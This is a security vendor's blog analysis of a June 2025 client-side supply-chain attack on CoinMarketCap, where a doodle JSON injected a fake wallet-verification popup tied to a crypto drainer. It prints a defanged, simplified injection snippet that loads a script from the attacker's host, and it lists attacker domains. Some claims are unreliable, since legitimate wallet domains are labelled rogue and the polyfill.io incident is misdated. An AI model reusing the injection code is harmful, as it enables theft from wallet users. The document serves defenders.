CoinMarketCap Client-Side Attack: A Comprehensive Analysis by C/Side

5 hours ago 1

On June 20, 2025, CoinMarketCap (CMC) — a cornerstone of the cryptocurrency ecosystem, relied upon by millions for real-time crypto data experienced a significant security incident. A client-side attack compromised its frontend, tricking users into connecting their crypto wallets through a sophisticated phishing scheme. This breach underscores critical vulnerabilities in supply chain security and the evolving tactics of cybercriminals targeting the crypto space.

Below, we break down the attack in two layers: a high-level summary for non-technical stakeholders and a detailed technical analysis for security professionals.

Source: https://x.com/DarkWebInformer/status/1936209452878745680

On June 20, 2025, users visiting CoinMarketCap’s homepage began seeing unexpected popups. These popups, designed to mimic CoinMarketCap’s branding, urged users to “verify their wallets” to “maintain full access” to the platform. The popups were not part of CMC’s legitimate features — they were the result of a client-side attack that hijacked the website’s frontend.

Attack Timing

Source: https://x.com/blockaid_/status/1936199273701687702

Critical Timing: The first malicious transaction linked to the attack was executed at 4:57 PM EST — a time likely chosen to coincide with the end of the workday for engineers and security teams, delaying immediate detection.

How It Started: The attack began with a small, seemingly harmless element on CMC’s homepage: a “doodle” image (a decorative graphic, like a holiday themed logo).
What Happened Next: This doodle image was linked to a third-party resource (a JSON file) hosted on an external domain (cdnkit.io). This resource contained hidden code that injected a fake popup into the user’s browser.
The Scam: The popup looked legitimate, using CMC’s colors, logos, and urgent language to trick users into connecting their crypto wallets (e.g., MetaMask, Phantom). Once connected, attackers could steal funds.
Why It’s Serious: This was a supply chain attack, meaning the breach didn’t target CMC’s own servers but a third-party tool or resource used by CMC. Such attacks are hard to detect because they exploit trusted elements of a platform.

To understand the attack’s mechanics, we break it into stages, from the initial trigger to the final payload.

CoinMarketCap’s homepage included a “doodle” section, a common feature for holidays or events (e.g., a special logo for World Heart Day). This doodle was loaded dynamically via an API request to:

hxxps://api.coinmarketcap[.]com/content/v3/doodle/get?type=5

The API returned a JSON file containing metadata about active doodles, including links to image files.

The Malicious JSON Response

The JSON response included a reference to a file hosted on cdnkit.io:

“lightModeFile”: “https://static.cdnkit[.]io/cmc/6855a83d80876056dab0a5cf.json"

This URL did not point to a simple image. Instead, it returned another JSON file with embedded JavaScript code.

The JSON from cdnkit.io contained a hidden JavaScript snippet designed to run in the user’s browser. Here’s a simplified breakdown of the code:

// Check if the attack has already been injected
if (!window.cmcInjected) {
window.cmcInjected = true;
// Modify the page to hide legitimate elements (e.g., the real CMC logo)
const logo = document.querySelector('.cmc-logo');
if (logo) {
logo.title = 'Go to homepage'; // Fake title to mimic legitimacy
logo.removeAttribute('data-text');
}
// Add CSS to style the fake popup
const style = document.createElement('style');
style.textContent = `.cmc-logo svg{margin-top:-3px}…`; // Hides real elements
document.head.appendChild(style);
// Inject the malicious popup script
const script = document.createElement('script');
script.src = 'hxxps://static.cdnkit[.]io/cmc/popup.js';
document.head.appendChild(script);
}

Key Observations

Client-Side Execution: The code runs in the user’s browser, not on CMC’s servers. This bypasses server-side security tools.
Persistence Check: The window.cmcInjected flag ensures the script runs only once per session, avoiding detection.
DOM Manipulation: The script modifies the page’s HTML/CSS to hide legitimate elements (e.g., the real CMC logo) and prepare for the fake popup.

The injected script (popup.js, hosted on blockassets[.]app) created a realistic-looking overlay. Here’s how it worked:

Popup Structure

The popup mimicked CMC’s design, with:

A “Verify Your Wallet” title.
A message urging urgency: “Please connect your wallet now to authenticate and maintain full access to your CoinMarketCap account.”
A “Connect Wallet” button styled to match CMC’s UI.

JavaScript Logic

The popup.js script included functions to:

Display the Popup: Add a full-screen overlay with the fake message.
Handle User Interaction: When the user clicks “Connect Wallet,” the script attempts to connect to a crypto wallet (e.g., MetaMask, Phantom).
Data Exfiltration: If connected, the script communicates with rogue domains (e.g., walletconnect.com, trustwallet.com) to steal wallet credentials or private keys.

The attack relied on domains with clear red flags:

| Domain | Details |
|----------------------------------------|----------------------------------------------------------------------------------------------|
| cdnkit.io | Hosted the initial malicious JSON. Domain registered in 2020; no direct link to CMC. |
| blockassets.app | Hosted popup.js and f43f9316-f6a5-4626-bafd-fd4fd52cb490.js. Not owned by CMC. |
| admin2.prod.coinmarketcap.supply | Misspelled domain mimicking CMC. WHOIS shows it's from 2018, not owned by CMC. |
| walletconnect.com | Redirects to reown.com, a known scam-related domain. |
| trustwallet.com | Linked to fraudulent browser extensions (per user reviews). |

Historically linked to fraudulent browser extensions (per user reviews).

The popup.js script interacted with a larger JavaScript library (hosted on blockassets.app) that included functions for:

Wallet Connection: Detecting and connecting to popular wallets (MetaMask, Phantom, etc.).
Adaptive Attack Logic: Customizing the phishing flow based on what wallet type was detected to avoid security warnings and failed signatures.
Transaction Signing: Tricking users into signing malicious transactions (e.g., approving token transfers).
Error Handling: Displaying fake error messages (e.g., “Your wallet is blacklisted”) to pressure users into retrying with different wallets.

Example Code Snippet

The customPopupOpen function in popup.js controlled the popup’s behavior:

Post-Attack Revelations

Source: https://x.com/ReyXBF/status/1936276267797475526

In the hours following the incident, a Telegram channel named “CommLeaks” shared screenshots allegedly from the attacker’s control panel. These images, tied to the “Inferno Drainer” (a well-documented malicious tool for draining crypto wallets), revealed:

Total Stolen Funds: Approximately $43,266 USD was siphoned from 110 victims who interacted with the fake wallet verification popup.
Attack Scale: The dashboard highlighted the attack’s reach, with hundreds of users tricked into connecting their wallets. This underscores the effectiveness of the social engineering tactics (urgency, realistic UI) paired with the client-side compromise.

The CoinMarketCap breach is part of a broader trend of supply chain compromises via third-party JavaScript. Attackers increasingly target libraries, CDNs, and SaaS tools integrated into websites. For example:

The Pollyfill attack (2025) saw malicious code distributed via cdn.polyfill.io, a widely used service for browser compatibility
Third-party scripts often have access to sensitive user data (e.g., cookies, wallet addresses), making them prime targets

Why Traditional Defenses Fail:

Server-side security tools (firewalls, WAFs) cannot inspect client-side code execution.
Even trusted services (e.g., analytics platforms) can be compromised, as seen in the CoinMarketCap doodle attack.

This incident is a textbook example of a supply chain attack. Attackers did not breach CoinMarketCap’s servers directly. Instead, they compromised a third-party resource (the doodle image’s JSON file) that CMC’s frontend trusted. This is akin to attacking a weak link in a chain — once the third-party resource was compromised, the attack propagated to all users loading CMC’s homepage.

Client-side attacks (code running in the user’s browser) are particularly dangerous because:

They bypass server-side security tools (e.g., firewalls, intrusion detection systems).
They exploit user trust in a familiar platform (CMC).
They can spread quickly, as the malicious code is loaded with every page visit.

Avoid Unsolicited Popups: Never connect your wallet via a popup, even on trusted sites. Legitimate platforms will not ask for wallet connections via unexpected popups.
Use Ad Blockers: Tools like uBlock Origin or AdGuard can block malicious scripts from loading.
Verify Domains: Check URLs for typos (e.g., coinmarketcap[.]supply vs. coinmarketcap[.]com).
Scrutinize Every Approval: Before signing, read the details in your wallet carefully. Be extra wary of requests asking for broad permissions.

For Platforms (e.g., CMC)

Audit Third-Party Integrations: Regularly review all external resources (images, scripts, APIs) loaded on your platform.
Subresource Integrity (SRI): Use SRI to ensure third-party scripts haven’t been tampered with (e.g., <script src=”https://cdn.example.com/library.js" integrity=”sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC” crossorigin=”anonymous”></script>).
Monitor Client-Side Activity: Use tools like Sentry or New Relic to detect unexpected JavaScript execution.

Leverage Third-Party JS Monitoring Tools:
Third-party scripts are a critical part of the modern web supply chain, but they also introduce risks. Malicious code injected via third-party libraries (e.g., analytics tools, ad networks, or polyfills) can compromise user data or enable attacks like the CoinMarketCap breach

How c/side Can Help:
Platforms like c/side specialize in monitoring, securing, and optimizing third-party JavaScript. Their services include:

Real-Time Payload Analysis: Track every request to detect malicious changes in third-party scripts
Supply Chain Attack Detection: Identify compromised dependencies (e.g., the 2025 cdn.polyfill.io incident that injected malicious code into thousands of sites)
PCI Compliance Support: Ensure third-party integrations meet security standards for industries handling sensitive data

Actionable Step:
Get a free account at cside.dev to start monitoring your third-party scripts and protect against supply chain vulnerabilities.

The CoinMarketCap breach is a stark reminder of the fragility of trust in the digital age. By hijacking a minor element like a doodle image, attackers infiltrated a platform relied upon by millions and weaponized that trust to steal funds. As crypto adoption grows, so too does the need for vigilance, both from platforms securing their supply chains and users scrutinizing every interaction.

For security teams, this incident underscores the importance of supply chain risk management. For users, it’s a call to stay alert: even trusted platforms can fall victim to clever phishing tactics.

Special thanks to our friend and guest blog contributor, Jack LaFond.

Read Entire Article